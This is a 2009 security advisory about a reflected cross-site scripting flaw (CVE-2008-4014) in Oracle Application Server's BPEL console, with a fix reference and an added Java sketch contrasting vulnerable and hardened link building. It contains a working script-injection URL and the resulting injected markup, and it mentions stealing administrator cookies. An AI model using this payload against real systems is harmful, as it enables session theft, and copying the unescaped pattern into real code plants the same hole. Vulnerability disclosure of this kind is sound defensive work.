Information Security


Additional information

  Multiple security vulnerabilities in Oracle products

  Hacktics Advisory Dec09: Oracle eBusiness Suite - Multiple Vulnerabilities Allow Remote Takeover

  Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART

  Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter)

  Oracle Application Server Portal 10g Cross Site Scripting Vulnerability

From: Alexandr Polyakov <alexandr.polyakov_(at)_dsec.ru>
Date: January 16, 2009
Subject: Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001


Digital Security Research Group [DSecRG] Advisory    #DSECRG-09-001



Application:                    Oracle Application Server (SOA)
Versions Affected:              Oracle Application Server (SOA) version 10.1.3.1.0
Vendor URL:                     http://www.oracle.com
Bugs:                           XSS
Exploits:                       YES
Reported:                       10.01.2008
Vendor response:                11.01.2008
Date of Public Advisory:        13.01.2009
CVE:                            CVE-2008-4014
Description:                    XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP
Author:                         Alexandr Polyakov
                               Digital Security Research Group [DSecRG]
                               (research [at] dsec [dot] ru)


Description
***********

A linked XSS vulnerability was found in the BPEL module of Oracle Application
Server (Oracle SOA Suite).



Details
*******


A linked XSS vulnerability was found in the BPEL module. On the page
BPELConsole/default/activities.jsp an attacker can inject XSS by appending it to
the URL.




Example
*******


http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG



The attacker must send the injected link to an administrator to obtain the
administrator's cookie.


Code with injected XSS:

----------------------------------------------------------------

</th>
                   <th id="activityLabel" class="ListHeader" align="left" nowrap>
                   <a href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class=HeaderLink>
                       Activity Label
                   </a>
                   </th>

---------------------------------------------------------------------------
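
The markup above breaks because the raw query string is copied into a single-quoted href without encoding. The sketch below is an added example, not part of the original advisory and not Oracle's code or patch: it reproduces that pattern next to one possible hardened form. The class name, the helper names and the processId parameter are hypothetical.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;

public class SortLinkDemo {
    // Hypothetical allowlist: the only request parameter the sort link carries over.
    private static final Set<String> ALLOWED = Set.of("processId");

    // Reproduces the flaw: the raw query string is pasted into a single-quoted href.
    static String vulnerableLink(String rawQuery) {
        return "<a href='activities.jsp?" + rawQuery + "&orderBy=label' class=HeaderLink>";
    }

    // Escape the characters that can close an attribute value or open a tag.
    static String escapeAttr(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }

    // Hardened: rebuild the query from allowlisted names, percent-encode, then escape.
    static String hardenedLink(Map<String, String> params) {
        StringBuilder q = new StringBuilder();
        for (Map.Entry<String, String> e : params.entrySet()) {
            if (!ALLOWED.contains(e.getKey())) continue; // unknown names are dropped
            q.append(URLEncoder.encode(e.getKey(), StandardCharsets.UTF_8)).append('=')
             .append(URLEncoder.encode(e.getValue(), StandardCharsets.UTF_8)).append('&');
        }
        q.append("orderBy=label");
        return "<a href='" + escapeAttr("activities.jsp?" + q) + "' class='HeaderLink'>";
    }

    public static void main(String[] args) {
        // Constructed request: the advisory's payload as a parameter name, plus one allowed parameter.
        String payloadName = "'><script>alert('DSecRG_XSS')</script>";
        Map<String, String> params = new LinkedHashMap<>();
        params.put(payloadName, "DSecRG");
        params.put("processId", "demo'1");
        String rawQuery = payloadName + "=DSecRG&processId=demo'1";

        // The quote in the parameter name closes the href, as in the advisory's output.
        System.out.println(vulnerableLink(rawQuery));
        // The payload name is dropped and the remaining quote is percent-encoded.
        System.out.println(hardenedLink(params));
    }
}
```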


Fix Information
***************

Information was published in CPU January 2009.
All customers can download CPU patches by following the instructions at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html




Credits
*******
Oracle credited Alexander Polyakov from Digital Security Company in
CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html





About
*****

Digital Security is a leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and
database security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact:        research [at] dsec [dot] ru
               http://www.dsecrg.ru
               http://www.dsec.ru





© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod